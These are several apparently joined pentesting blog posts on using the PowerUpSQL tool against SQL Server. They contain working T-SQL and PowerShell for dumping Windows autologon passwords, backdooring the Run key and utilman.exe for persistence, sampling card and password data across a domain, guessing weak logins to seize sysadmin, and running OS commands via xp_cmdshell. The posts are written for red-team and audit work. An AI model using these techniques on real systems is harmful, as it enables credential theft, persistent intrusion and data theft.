Back

Get Windows Auto Login Passwords via SQL Server with PowerUpSQL

August 4, 2016 | Scott Sutherland

In this blog I’ll show how to use PowerUpSQL to dump Windows auto login passwords through SQL Server. I’ll also talk about other ways the xp_regread stored procedure can be used during pentests.

A brief history of xp_regread

The xp_regread extended stored procedure has been around since SQL Server 2000. The original version allowed members of the Public server role to access pretty much anything the SQL Server service account had privileges to. At the time, it had a pretty big impact, because it was common for SQL Servers to run as LocalSystem.

Since SQL Server 2000 SP4 was released, the impact of the xp_regread has been pretty minimal due to a few access controls that were added that help prevent low privileged logins from accessing sensitive registry locations. Now days, the only registry locations accessible to unprivileged users are related to SQL Server. For a list of those locations you can visit https://support.microsoft.com/en-us/kb/887165

Below are a few of the more interesting accessible paths:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Search
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQLServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Messaging Subsystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\SQLServer
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SQLServer
HKEY_CURRENT_USER\Software\Microsoft\Mail HKEY_CURRENT_USER\Control Panel\International

Practical uses for xp_regread with the Public Role

Even with our hands tied, xp_regread can be used to grab a lot of useful information. In fact, when logged in as least privilege login, I often use it to grab server information that I couldn’t get anywhere else. For example, the Get-SQLServerInfo function in PowerUpSQL includes some of those queries.

PS C:\> Get-SQLServerInfo
ComputerName           : SQLServer1
Instance               : SQLServer1
DomainName             : demo.local
ServiceName            : MSSQLSERVER
ServiceAccount         : NT Service\MSSQLSERVER
AuthenticationMode     : Windows and SQL Server Authentication
Clustered              : No
SQLServerVersionNumber : 12.0.4213.0
SQLServerMajorVersion  : 2014
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : SP1
OSArchitecture         : X64
OsMachineType          : WinNT
OSVersionName          : Windows 8.1 Pro
OsVersionNumber        : 6.3
Currentlogin           : demo\user
IsSysadmin             : Yes
ActiveSessions         : 3

The access control restrictions implemented in SQL Server SP4 do not apply to sysadmins. As a result, anything the SQL Server service account can access in the registry, a sysadmin can access via xp_regread.

At first glance this may not seem like a big deal, but it does allow us to pull sensitive data from the registry without having to enable xp_cmdshell, which can trigger a lot of alarms when it’s enabled and used. So xp_regread actually ends up being handy for basic SQL Server post exploitation tasks.

Recovering Windows Auto Login Credentials with xp_regread

It’s possible to configure Windows to automatically login when the computer is started. While this is not a common configuration in corporate environments, it’s something we see frequently in retail environments. Especially those that support legacy POS terminals and kiosks with SQL Servers running locally. In most cases, when Windows is configured to login automatically, unencrypted credentials are stored in the registry key:

HKEY_LOCAL_MACHINE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Using that information we can write a basic TSQL script that uses xp_regread to pull the auto login credentials out of the registry for us without having to enable xp_cmdshell. Below is an example TSQL script, but since the registry paths aren’t on the allowed list we have to run the query as a sysadmin:

-------------------------------------------------------------------------
-- Get Windows Auto Login Credentials from the Registry
-------------------------------------------------------------------------

-- Get AutoLogin Default Domain
DECLARE @AutoLoginDomain  SYSNAME
EXECUTE master.dbo.xp_regread
@rootkey        = N'HKEY_LOCAL_MACHINE',
@key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',
@value_name        = N'DefaultDomainName',
@value            = @AutoLoginDomain output

-- Get AutoLogin DefaultUsername
DECLARE @AutoLoginUser  SYSNAME
EXECUTE master.dbo.xp_regread
@rootkey        = N'HKEY_LOCAL_MACHINE',
@key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',
@value_name        = N'DefaultUserName',
@value            = @AutoLoginUser output

-- Get AutoLogin DefaultUsername
DECLARE @AutoLoginPassword  SYSNAME
EXECUTE master.dbo.xp_regread
@rootkey        = N'HKEY_LOCAL_MACHINE',
@key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',
@value_name        = N'DefaultPassword',
@value            = @AutoLoginPassword output 

-- Display Results
SELECT @AutoLoginDomain, @AutoLoginUser, @AutoLoginPassword

I’ve also created a PowerUpSQL function called “Get-SQLRecoverPwAutoLogon” so you could run it on scale. It will recover the default Windows auto login information and the alternative Windows auto login information if it has been set. Then it returns the associated domain name, user name, and password.

Below is a command example for those who are interested. If you’re interest in learning about blindy targeting SQL Server you can peek at this blog.

PS C:\> $Accessible = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose -Threads 15| Where-Object {$_.Status –eq “Accessible”}
PS C:\> $Accessible | Get-SQLRecoverPwAutoLogon -Verbose
VERBOSE: SQLServer1.demo.local\Instance1 : Connection Success.
VERBOSE: SQLServer2.demo.local\Application : Connection Success.
VERBOSE: SQLServer2.demo.local\Application : This function requires sysadmin privileges. Done.
VERBOSE: SQLServer3.demo.local\2014 : Connection Success.
VERBOSE: SQLServer3.demo.local\2014 : This function requires sysadmin privileges. Done.

ComputerName : SQLServer1
Instance     : SQLServer1\Instance1
Domain       : demo.local
UserName     : KioskAdmin
Password     : test

ComputerName : SQLServer1
Instance     : SQLServer1\Instance1
Domain       : demo.local
UserName     : kioskuser
Password     : KioskUserPassword!

Wrap Up

Even though the xp_regread extended stored procedure has been partially neutered, there are still a number of ways that it can prove useful during penetration tests and red team engagements. Hopefully you’ll have some fun with the “Get-SQLServerInfo”, “Get-SQLRecoverPwAutoLogon” functions that build off of its capabilities. More registry fun to come. In the meantime, good luck and hack responsibly!

References

Scott Sutherland

Recent Posts

                                                        <img width="832" height="451" src="https://www.netspi.com/wp-content/uploads/03-11-24_Outlook-Client-CVE-2024-21378_Feature-Image.jpg" alt="CVE-2024-21378 — Remote Code Execution in Microsoft Outlook ">												
                                                    
                                                            Red Team OperationsTechnical BlogAdversary Simulation                                                        
March 11, 2024

                                                            CVE-2024-21378 — Remote Code Execution in Microsoft Outlook 
                                                        
                                                                                <img data-del="avatar" src='https://www.netspi.com/wp-content/uploads/Rich-Wolferd-150x150.jpg' class='avatar pp-user-avatar avatar-96 photo ' height='96' width='96'/>                                                                                  
                                                                        
                                                                                <img data-del="avatar" src='https://www.netspi.com/wp-content/uploads/Nick-Landers_SQ-150x150.jpg' class='avatar pp-user-avatar avatar-96 photo ' height='96' width='96'/>                                                                                  
                                                                        
                                                        <img width="832" height="451" src="https://www.netspi.com/wp-content/uploads/02-22-24_Using-Web-Assembly-to-Smuggle-Malware_Feature-Image.jpg" alt="The Silk Wasm: Obfuscating HTML Smuggling with Web Assembly">												
                                                    
                                                            Technical BlogAdversary Simulation                                                        
February 26, 2024

                                                            The Silk Wasm: Obfuscating HTML Smuggling with Web Assembly
                                                        
                                                                                <img data-del="avatar" src='https://www.netspi.com/wp-content/uploads/Phil-Wilson-Smith-Kopp-150x150.jpg' class='avatar pp-user-avatar avatar-96 photo ' height='96' width='96'/>                                                                                  
                                                                        
                                                        <img width="832" height="451" src="https://www.netspi.com/wp-content/uploads/071323_Anti-Scraping-Pt2_Feature.jpg" alt="Anti-Scraping Part 2: Implementing Protections">												
                                                    
                                                            Technical BlogAdversary Simulation                                                        
July 13, 2023

                                                            Anti-Scraping Part 2: Implementing Protections
                                                        
                                                                                <img data-del="avatar" src='https://www.netspi.com/wp-content/uploads/Noah-Dunn-150x150.jpg' class='avatar pp-user-avatar avatar-96 photo ' height='96' width='96'/>

Back

Establishing Registry Persistence via SQL Server with PowerUpSQL

August 5, 2016 | Scott Sutherland

In this blog I’ll show how to use PowerUpSQL to establish persistence (backdoor) via the Windows registry through SQL Server. I’ll also provide a brief overview of the xp_regwrite stored procedure. This should be interesting to pentesters and red teamers interested in some alternative ways to access the OS through SQL Server.

An overview of xp_regwrite

xp_regwrite is an undocumented native extended stored procedure in SQL Server. Since it’s been around since SQL Server 2000 I use the term “undocumented” loosely. It allows logins to create and edit Windows registry keys without having to enable and use xp_cmdshell. The downside (from the attacker’s perspective) is that it can only be executed by a sysadmin. While that restriction usually rules it out as a privilege escalation vector, it is incredibly handy during post exploitation.

The registry is integrated into most aspects of the Windows operation. So you’re only limited by your imagination and the SQL Server service account. Similar to other extended stored procedures, xp_regwrite executes with the SQL Server service account’s privileges. So if it can write to the registry as LocalSystem, then so can you.

While the sky is the limit, at the end of the day I’m still a pentester at heart. So I thought it would be useful to show how to use xp_regwrite to establish persistence. There are hundreds of registry keys (if not more) that can lead to command execution, but the two examples below seem to be some of the most common.

PowerUpSQL primer

Before we get started, if you would like an overview of PowerUpSQL check out the blog here. Also, if just want to learn how to use PowerUpSQL to discover SQL Servers check out this blog.

Using CurrentVersionRun to establish persistence with xp_regwrite

The example below shows how to use xp_regwrite to add a command to the HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun registry key. The command will be run automatically anytime a user logs into Windows.

---------------------------------------------
-- Use SQL Server xp_regwrite to configure 
-- a file to run via UNC Path when users login
----------------------------------------------
EXEC master..xp_regwrite
@rootkey     = 'HKEY_LOCAL_MACHINE',
@key         = 'SoftwareMicrosoftWindowsCurrentVersionRun',
@value_name  = 'EvilSauce',
@type        = 'REG_SZ',
@value       =  'EvilBoxEvilSandwich.exe '

I wrote that functionality into the PowerUpSQL “Get-SQLPersistRegRun” function to make the task a little easier.

The example below shows how to run a simple PowerShell command, but in the real world it would do something evil. This type of persistence is also supported by The Metasploit Framework and PowerShell Empire.

PS C:> Get-SQLPersistRegRun -Verbose -Name PureEvil -Command 'PowerShell.exe -C "Write-Output hacker | Out-File C:tempiamahacker.txt"' -Instance "SQLServer1STANDARDDEV2014"
VERBOSE: SQLServer1STANDARDDEV2014 : Connection Success.
VERBOSE: SQLServer1STANDARDDEV2014 : Attempting to write value: PureEvil
VERBOSE: SQLServer1STANDARDDEV2014 : Attempting to write command: PowerShell.exe -C "Write-Output hacker | Out-File C:tempiamahacker.txt"
VERBOSE: SQLServer1STANDARDDEV2014 : Registry entry written.
VERBOSE: SQLServer1STANDARDDEV2014 : Done.

The example below shows how to run a simple a command from an attacker controlled share via a UNC path similar to the TSQL example.

.Example
PS C:> Get-SQLPersistRegRun -Verbose -Name EvilSauce -Command "EvilBoxEvilSandwich.exe" -Instance "SQLServer1STANDARDDEV2014"
VERBOSE: SQLServer1STANDARDDEV2014 : Connection Success.
VERBOSE: SQLServer1STANDARDDEV2014 : Attempting to write value: EvilSauce
VERBOSE: SQLServer1STANDARDDEV2014 : Attempting to write command: "EvilBoxEvilSandwich.exe
VERBOSE: SQLServer1STANDARDDEV2014 : Registry entry written.
VERBOSE: SQLServer1STANDARDDEV2014 : Done.

Setting a debugger for accessibility options using xp_regwrite

This is a cool persistence method, because no user interaction is required to execute commands on the system. Which I prefer of course. 🙂

The example below shows how to configure a debugger for utilman.exe, which will run cmd.exe when it’s called. That includes when you’re at the log in screen. After it’s been executed, it’s possible to RDP to the system and launch cmd.exe with the windows key+u key combination.

EXEC master..xp_regwrite
@rootkey     = 'HKEY_LOCAL_MACHINE',
@key         = 'SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsutilman.exe',
@value_name  = 'Debugger',
@type        = 'REG_SZ',
@value       = '"c:windowssystem32cmd.exe"'

Note:If network level authentication is enabled you won’t have enough access to see the logon screen and you may have to consider other options for command execution. Of course, that’s just another registry setting. 😉

I’ve written a PowerUpSQL function for this too, called “Get-SQLPersistRegDebugger”. Below is the utilman.exe example.

PS C:> Get-SQLPersistRegDebugger-Verbose -FileName utilman.exe -Command 'c:windowssystem32cmd.exe' -Instance "SQLServer1STANDARDDEV2014"
VERBOSE: SQLServer1STANDARDDEV2014 : Connection Success.
VERBOSE: SQLServer1STANDARDDEV2014 : Attempting to write debugger for: utilman.exe
VERBOSE: SQLServer1STANDARDDEV2014 : Attempting to write command: c:windowssystem32cmd.exe
VERBOSE: SQLServer1STANDARDDEV2014 : Registry entry written.
VERBOSE: SQLServer1STANDARDDEV2014 : Done.

Wrap Up

Even though the xp_regwrite extended stored procedure is only executable by sysadmins, it’s still incredibly handy during post exploitation. To illustrate that point I created two PowerUpSQL functions to establish persistence in Windows through SQL Server using xp_regwrite. Hopefully this has been useful and will get you thinking about other things xp_regwrite can do for you. Good luck and hack responsibly!

References

https://sqlmag.com/t-sql/using-t-sql-manipulate-registry

Scott Sutherland

Recent Posts

                                                        <img width="832" height="451" src="https://www.netspi.com/wp-content/uploads/122222_Republish-15-Ways-to-Bypass-the-PowerShell-Execution-Policy_Feature.jpg" alt="15 Ways to Bypass the PowerShell Execution Policy">												
                                                    
                                                            Technical BlogNetwork Penetration Testing                                                        
December 16, 2022

                                                            15 Ways to Bypass the PowerShell Execution Policy
                                                        
                                                                                <img data-del="avatar" src='https://www.netspi.com/wp-content/uploads/Scott_Sutherland-150x150.jpg' class='avatar pp-user-avatar avatar-96 photo ' height='96' width='96'/>                                                                                  
                                                                        
                                                        <img width="832" height="451" src="https://www.netspi.com/wp-content/uploads/080922_SMB-Shares-PowerHunt-Blog_Feature.jpg" alt="Attacking and Remediating Excessive Network Share Permissions in Active Directory Environments">												
                                                    
                                                            Adversary SimulationNetwork Penetration TestingTechnical Blog                                                        
August 9, 2022

                                                            Attacking and Remediating Excessive Network Share Permissions in Active Directory Environments
                                                        
                                                                                <img data-del="avatar" src='https://www.netspi.com/wp-content/uploads/Scott_Sutherland-150x150.jpg' class='avatar pp-user-avatar avatar-96 photo ' height='96' width='96'/>                                                                                  
                                                                        
                                                        <img width="832" height="451" src="https://www.netspi.com/wp-content/uploads/2021/07/072221_Tokenvator-Release-3_Feature.jpg" alt="Tokenvator Release 3">												
                                                    
                                                            Technical BlogNetwork Penetration Testing                                                        
July 22, 2021

                                                            Tokenvator Release 3
                                                        
                                                                                <img data-del="avatar" src='https://www.netspi.com/wp-content/uploads/Alexander-Leary-150x150.png' class='avatar pp-user-avatar avatar-96 photo ' height='96' width='96'/>

Back

Finding Sensitive Data on Domain SQL Servers using PowerUpSQL

August 2, 2016 | Scott Sutherland

In this blog I’ll show how PowerUpSQL can be used to rapidly target and sample sensitive data stored in SQL Server databases associated with Active Directory domains. We’ve used the techniques below to discover millions of PCI, HIPAA, and other sensitive records living inside and outside of protected network zones. Hopefully PowerUpSQL can help you do the same.

Finding Domain SQL Servers to Log Into

I touched on how to do this in another blog so I’ve only provided a summary of the PowerUpSQL commands below. For more information on how to discover accessible SQL Servers check out https://blog.netspi.com/blindly-discover-sql-server-instances-powerupsql/.

Download PowerUpSQL.https://github.com/NetSPI/PowerUpSQL
Import the Module
```
PS C:\> Import-Module PowerUpSQL.psd1
```

Get a list of accessible SQL Servers on the domain.

PS C:\> $Servers = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose -Threads 10

View accessible servers

PS C:\> $Accessible = $Servers | Where-Object {$_.Status –eq “Accessible”}
PS C:\> $Accessible

ComputerName   Instance                       Status    
------------   --------                       ------    
SQLServer1     SQLServer1\SQLEXPRESS          Accessible
SQLServer1     SQLServer1\STANDARDDEV2014     Accessible
SQLServer1     SQLServer1                     Accessible

Pro tip: Once you’ve obtained Domain Admin privileges, add yourself to the DBA groups and run through the process again. More access = more data. 🙂

Finding Sensitive Data on Domain SQL Servers

If you followed the instructions in the last section you should have a variable named “$Accessible” that contains a list of all accessible SQL Server instances. The command below uses that variable to perform a broad search across all accessible SQL Servers for database table column names that contain provided keywords. I’ve created an example showing one server, but in real environments there are often hundreds.

PS C:\> $Accessible | Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword “card, password” –SampleSize 2 –ValidateCC -NoDefaults | ft -AutoSize

...[SNIP]...

VERBOSE: SQLServer1\STANDARDDEV2014 : START SEARCH DATA BY COLUMN
VERBOSE: SQLServer1\STANDARDDEV2014 : CONNECTION SUCCESS
VERBOSE: SQLServer1\STANDARDDEV2014 : - Searching for column names that match criteria...
VERBOSE: SQLServer1\STANDARDDEV2014 : - Column match: [testdb].[dbo].[tracking].[card]
VERBOSE: SQLServer1\STANDARDDEV2014 : - Selecting 2 rows of data sample from column [testdb].[dbo].[tracking].[card].
VERBOSE: SQLServer1\STANDARDDEV2014 : COMPLETED SEARCH DATA BY COLUMN

...[SNIP]...

ComputerName   Instance                   Database Schema Table    Column Sample           RowCount IsCC
------------   --------                   -------- ------ -----    ------ ------           -------- ----
SQLServer1     SQLServer1\STANDARDDEV2014 testdb   dbo    tracking card   4111111111111111 2        True
SQLServer1     SQLServer1\STANDARDDEV2014 testdb   dbo    tracking card   41111111111ASDFD 2        False

...[SNIP]...

Below is a breakdown of what the command does:

It runs 10 concurrent host threads at a time
It searches accessible domain SQL Servers for database table columns containing the keywords “card” or “password”
It grabs a two sample records from each matching column
It checks if the sample data contains a credit card number using the Luhn formula
It filters out all default databases

If you want to target a single server you can also use the command below.

Get-SQLColumnSampleData –Verbose –Keyword “card, password” –SampleSize 2 –ValidateCC -NoDefaults  –Instance “Server1\Instance1”

Targeting Potentially Sensitive Databases

To save time in larger environments you may want to be a little more picky about what servers you’re targeting during data searches. Especially if you’re searching for multiple keywords. Dumping a list of databases and their properties can give you the information you need to make better server targeting decisions.

Some key pieces of information include:

Database Name
This is the most intuitive. Databases are often named after the associated application or the type of data they contain.
is_encrypted Flag
This tells us if transparent encryption is used. People tend to encrypt things they want to protect so these databases make good targets. 😉 Transparent encryption is intended to protect data at rest, but if we login as a sysadmin, SQL Server will do the work of decrypting it for us. A big thanks goes out to James Houston for sharing that trend with us.
Database File Size
The database file size can help you determine if the database is actually being used. The bigger the database, the more data to sample. 🙂

To dump a list of all accessible SQL Server databases you can use the command below. Once again, we’ll use the “$Accessible” variable we created earlier. Storing the accessible servers in a variable allows us to quickly execute different PowerUpSQL functions against those servers without having to run the discovery commands again.

Note: The example only shows a sample of the output for one record, but in most environments you would have a lot more.

PS C:\> $Databases = $Accessible | Get-SQLDatabaseThreaded –Verbose –Threads 10 -NoDefaults
PS C:\> $Databases

...[SNIP]...

ComputerName        : SQLServer1
Instance            : SQLServer1\STANDARDDEV2014
DatabaseId          : 7
DatabaseName        : testdb
DatabaseOwner       : sa
OwnerIsSysadmin     : 1
is_trustworthy_on   : True
is_db_chaining_on   : False
is_broker_enabled   : True
is_encrypted        : True
is_read_only        : False
create_date         : 4/13/2016 4:27:36 PM
recovery_model_desc : FULL
FileName            : C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDDEV2014\MSSQL\DATA\testdb.mdf
DbSizeMb            : 3.19
has_dbaccess        : 1

...[SNIP]...

Once the results are stored in the “$Databases” variable there a ton of ways to view the data. Below are some of the more common options. In the examples, the results are sorted by the database name alphabetically.

# Output results to display
$Databases | Sort-Object DatabaseName

# Output results to display in table format
$Databases | Sort-Object DatabaseName | Format-Table -AutoSize

# Output results to pop grid with search functionality
$Databases | Sort-Object DatabaseName | Out-GridView

# Output results to a csv file
$Databases | Sort-Object DatabaseName | Export-Csv -NoTypeInformation  C:\temp\databases.csv

If you’re only interested in encrypted databases you can use the command below.

$Databases | Where-Object {$_.is_encrypted –eq “TRUE”}

The “$Databases” output can also be piped directly into the Get-SQLColumnSampleDataThreaded command as shown below.

$Databases | Where-Object {$_.is_encrypted –eq “TRUE”} |Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword “card, password” –SampleSize 2 –ValidateCC -NoDefaults

Of course, some people are not fans of multi step commands…

Bringing it All Together

If you prefer to fully automate your data sampling experience everything can be executed as a single command. Below is an example:

Get-SQLInstanceDomain -Verbose | Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword “credit,ssn,password” –SampleSize 2 –ValidateCC –NoDefaults |
Export-CSV –NoTypeInformation c:\temp\datasample.csv

Wrap Up

In this blog I showed how sensitive data could be targeted and quickly sampled from domain SQL Servers using PowerUpSQL. I also noted that databases that use transparent encryption tend to make good targets for review. Hopefully the scripts will save you as much time as they’ve saved us. Either way, good luck and hack responsibly!

Scott Sutherland

Recent Posts

                                                        <img width="832" height="451" src="https://www.netspi.com/wp-content/uploads/122222_Republish-15-Ways-to-Bypass-the-PowerShell-Execution-Policy_Feature.jpg" alt="15 Ways to Bypass the PowerShell Execution Policy">												
                                                    
                                                            Technical BlogNetwork Penetration Testing                                                        
December 16, 2022

                                                            15 Ways to Bypass the PowerShell Execution Policy
                                                        
                                                                                <img data-del="avatar" src='https://www.netspi.com/wp-content/uploads/Scott_Sutherland-150x150.jpg' class='avatar pp-user-avatar avatar-96 photo ' height='96' width='96'/>                                                                                  
                                                                        
                                                        <img width="832" height="451" src="https://www.netspi.com/wp-content/uploads/080922_SMB-Shares-PowerHunt-Blog_Feature.jpg" alt="Attacking and Remediating Excessive Network Share Permissions in Active Directory Environments">												
                                                    
                                                            Adversary SimulationNetwork Penetration TestingTechnical Blog                                                        
August 9, 2022

                                                            Attacking and Remediating Excessive Network Share Permissions in Active Directory Environments
                                                        
                                                                                <img data-del="avatar" src='https://www.netspi.com/wp-content/uploads/Scott_Sutherland-150x150.jpg' class='avatar pp-user-avatar avatar-96 photo ' height='96' width='96'/>                                                                                  
                                                                        
                                                        <img width="832" height="451" src="https://www.netspi.com/wp-content/uploads/2021/07/072221_Tokenvator-Release-3_Feature.jpg" alt="Tokenvator Release 3">												
                                                    
                                                            Technical BlogNetwork Penetration Testing                                                        
July 22, 2021

                                                            Tokenvator Release 3
                                                        
                                                                                <img data-del="avatar" src='https://www.netspi.com/wp-content/uploads/Alexander-Leary-150x150.png' class='avatar pp-user-avatar avatar-96 photo ' height='96' width='96'/>

Back

Finding Weak Passwords for Domain SQL Servers on Scale using PowerUpSQL

August 2, 2016 | Scott Sutherland

In this blog, I’ll show how to use PowerUpSQL to quickly identify SQL logins configured with weak passwords on domain SQL Servers, using a standard domain account. We’ve used the techniques described below to obtain access to sensitive data and elevate privileges on SQL Servers. In many cases, the identified weak passwords also lead to domain privilege escalation via sysadmin access.

Hopefully this blog will be interesting to pentesters, red teamers, and administrators looking for another tool for auditing their SQL Servers for weak configurations.

Finding Domain SQL Servers to Log Into

I touched on how to do this in another blog, so I’ve only provided a summary of the PowerUpSQL commands below. For more information on how to discover accessible SQL Servers check out https://blog.netspi.com/blindly-discover-sql-server-instances-powerupsql/.

Download PowerUpSQL.
https://github.com/NetSPI/PowerUpSQL
Import the Module
```
PS C:\> Import-Module PowerUpSQL.psd1
```

Get a list of accessible SQL Servers on the domain.

PS C:\> $Servers = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose -Threads 10

View accessible servers

PS C:\> $Accessible = $Servers | Where-Object {$_.Status –eq “Accessible”}
PS C:\> $Accessible

ComputerName   Instance                       Status    
------------   --------                       ------    
SQLServer1     SQLServer1\SQLEXPRESS          Accessible
SQLServer1     SQLServer1\STANDARDDEV2014     Accessible
SQLServer1     SQLServer1                     Accessible

Enumerating SQL Logins as a Domain User

By default, non-sysadmin logins in SQL Server don’t have privileges to select a list of SQL logins from the standard tables. However, functions exist in SQL Server that allow least privilege logins to do it anyways using basic fuzzing techniques. That means any user that can log into SQL Server can get a full user list. For the details check out this blog.

The PowerUpSQL “Invoke-SQLAuditWeakLoginPw” function can be used to automatically fuzz login names and attempt to identify weak passwords. By default, the function will only test the login as the password, and “password” as the password. So only two passwords will be attempted for each enumerated login. However, custom user and password lists can be provided.

At first glance this doesn’t seem like a big deal. However, in large environments this simple attack has been yielding hundreds of weak passwords on accessible SQL Servers using normal domain user accounts.

Identifying Weak SQL Server Passwords on Scale using PowerUpSQL

Below are a few examples showing how to use the “Invoke-SQLAuditWeakLoginPw” function with the accessible SQL Server list we obtained in the last section.

Note: All of the examples shown are run as the current Windows user, but alternative SQL Server login credentials can be provided.

PS C:\>; $Accessible | Invoke-SQLAuditWeakLoginPw –Verbose

ComputerName : SQLServer1
Instance : SQLServer1\EXPRESS
Vulnerability : Weak Login Password
Description : One or more SQL Server logins is configured with a weak password. This may provide unauthorized access to resources the affected logins have access to.
Remediation : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy.
Severity : High
IsVulnerable : Yes
IsExploitable : Yes
Exploited : No
ExploitCmd : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit.
Details : The testuser (Not Sysadmin) is configured with the password testuser.
Reference : https://msdn.microsoft.com/en-us/library/ms161959.aspx
Author : Scott Sutherland (@_nullbind), NetSPI 2016

ComputerName : SQLServer1
Instance : SQLServer1\Express
Vulnerability : Weak Login Password
Description : One or more SQL Server logins is configured with a weak password. This may provide unauthorized access to resources the affected logins have access to.
Remediation : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy.
Severity : High
IsVulnerable : Yes
IsExploitable : Yes
Exploited : No
ExploitCmd : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit.
Details : The testadmin (Sysadmin) is configured with the password testadmin.
Reference : https://msdn.microsoft.com/en-us/library/ms161959.aspx
Author : Scott Sutherland (@_nullbind), NetSPI 2016

The function also supports automatically adding your current login to the sysadmin fixed server role if a sysadmin password is guessed by the script. Below is an example.

PS C:\> Invoke-SQLAuditWeakLoginPw –Verbose –Instance server\instance –Exploit

..[snip]..

ComputerName  : SQLServer1
Instance      : SQLServer1\Express
Vulnerability : Weak Login Password
Description   : One or more SQL Server logins is configured with a weak password.  This may provide unauthorized access to resources the affected logins have access to.
Remediation   : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy.
Severity      : High
IsVulnerable  : Yes
IsExploitable : Yes
Exploited     : Yes
ExploitCmd    : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit.
Details       : The testadmin (Sysadmin) is configured with the password testadmin.
Reference     : https://msdn.microsoft.com/en-us/library/ms161959.aspx
Author        : Scott Sutherland (@_nullbind), NetSPI 2016

..[snip]..

Or you could attempt to add yourself as a sysadmin on all accessible servers…

PS C:\> $Accessible | Invoke-SQLAuditWeakLoginPw –Verbose –Exploit

Executing OS Commands on SQL Servers with PowerUpSQL

If you were able to escalate privileges using the commands from the previous section then you’re ready to execute OS commands on the SQL Server. The local and domain privileges you’ll have will vary depending on the SQL Server service account being used. It’s very common to see a single domain account being used to run a large portion of the SQL Servers in the environment. However, it’s also very common for SQL Servers to be configured to run as LocalSystem or a managed service account.

Below is the PowerUpSQL example showing how to execute OS commands on affected SQL Servers:

PS C:\> Invoke-SQLOSCmd –Verbose –Instance SQLServer1\Express –Command “dir c:\windows\system32\Drivers\etc” –RawResults

VERBOSE: Creating runspace pool and session states
VERBOSE: SQLSERVER1\EXPRESS: Connection Success.
VERBOSE: SQLSERVER1\EXPRESS: You are a sysadmin.
VERBOSE: SQLSERVER1\EXPRESS: Show Advanced Options is already enabled.
VERBOSE: SQLSERVER1\EXPRESS: xp_cmdshell is already enabled.
VERBOSE: SQLSERVER1\EXPRESS: Running command: dir c:\windows\system32\Drivers\etc
 Volume in drive C is OSDisk
 Volume Serial Number is C044-F8BC
 Directory of c:\windows\system32\Drivers\etc
07/16/2016  08:42 PM    <DIR>          .
07/16/2016  08:42 PM    <DIR>          ..
09/22/2015  10:16 AM               851 hosts
08/22/2013  10:35 AM             3,683 lmhosts.sam
08/22/2013  08:25 AM               407 networks
08/22/2013  08:25 AM             1,358 protocol
08/22/2013  08:25 AM            17,463 services
               5 File(s)         23,762 bytes
               2 Dir(s)  142,140,887,040 bytes free
VERBOSE: Closing the runspace pool

Or if you would like to run commands on multiple servers you can use the example below.

PS C:\>$Accessible | Invoke-SQLOSCmd –Verbose –Command “whoami” –Threads 10

ComputerName   Instance                       CommandResults              
------------   --------                       --------------                   
SQLServer1     SQLServer1\SQLEXPRESS          nt service\mssql$sqlexpress 
SQLServer1     SQLServer1\STANDARDDEV2014     nt authority\system         
SQLServer1     SQLServer1                     Domain\SQLSvc

Wrap Up

In this blog, I provided an overview of how to use the PowerUpSQL function “Invoke-SQLAuditWeakLoginPw” to quickly identify SQL Server logins configured with weak passwords on ADS domains. While the function doesn’t offer any new techniques, it does provide more automation than the scripts I’ve provided in the past. As a result, it has potential to provide unauthorized data access and additional domain privileges in most large environments. It’s also worth noting that the “Invoke-SQLEscalatePriv” function attempts to exploit this issue along with others when it’s run.

Good luck and hack responsibility!

Scott Sutherland

Recent Posts

                                                        <img width="832" height="451" src="https://www.netspi.com/wp-content/uploads/122222_Republish-15-Ways-to-Bypass-the-PowerShell-Execution-Policy_Feature.jpg" alt="15 Ways to Bypass the PowerShell Execution Policy">												
                                                    
                                                            Technical BlogNetwork Penetration Testing                                                        
December 16, 2022

                                                            15 Ways to Bypass the PowerShell Execution Policy
                                                        
                                                                                <img data-del="avatar" src='https://www.netspi.com/wp-content/uploads/Scott_Sutherland-150x150.jpg' class='avatar pp-user-avatar avatar-96 photo ' height='96' width='96'/>                                                                                  
                                                                        
                                                        <img width="832" height="451" src="https://www.netspi.com/wp-content/uploads/080922_SMB-Shares-PowerHunt-Blog_Feature.jpg" alt="Attacking and Remediating Excessive Network Share Permissions in Active Directory Environments">												
                                                    
                                                            Adversary SimulationNetwork Penetration TestingTechnical Blog                                                        
August 9, 2022

                                                            Attacking and Remediating Excessive Network Share Permissions in Active Directory Environments
                                                        
                                                                                <img data-del="avatar" src='https://www.netspi.com/wp-content/uploads/Scott_Sutherland-150x150.jpg' class='avatar pp-user-avatar avatar-96 photo ' height='96' width='96'/>                                                                                  
                                                                        
                                                        <img width="832" height="451" src="https://www.netspi.com/wp-content/uploads/2021/07/072221_Tokenvator-Release-3_Feature.jpg" alt="Tokenvator Release 3">												
                                                    
                                                            Technical BlogNetwork Penetration Testing                                                        
July 22, 2021

